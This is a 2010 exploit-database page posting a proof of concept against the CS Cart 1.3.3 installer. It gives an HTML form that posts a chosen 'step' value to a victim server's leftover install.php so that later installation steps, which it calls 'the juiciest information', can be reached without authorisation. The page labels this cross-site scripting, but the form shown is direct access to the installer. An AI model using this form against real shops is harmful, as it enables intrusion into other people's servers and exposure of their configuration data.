[webapps / 0day] - CS Cart 1.3.3 (install.php) Cross Site Sc
Posted on 08 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>CS Cart 1.3.3 (install.php) Cross Site Scripting Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: crmpays' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================================== CS Cart 1.3.3 (install.php) Cross Site Scripting Vulnerability ============================================================== # Exploit Title: [CS CART 1.3.3 INSTALL.PHP XSS] # Date: [2010-09-08] # Author: [LogicGate] # Software Link: [http://cs-cart.smartcode.com/] # Version: [1.3.3] # Tested on: [N/A] # CVE : [N/A] If "install.php" was not removed after installation simply make an html file with the following code and replace <Victim Server> by the PATH to "install.php" example:"http://www.nonexistant.com/install.php": <html> <form name="installform" method="post" action="http://<Victim Ip>/install.php"> <input type="text" name="step"> <input type="submit" id="nextbut" value="xss"> </form> </html> After that open the HTML file you have just created and enter which ever step of the installation you would like to access. Step "3" is where the juiciest information is. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre></body></html>
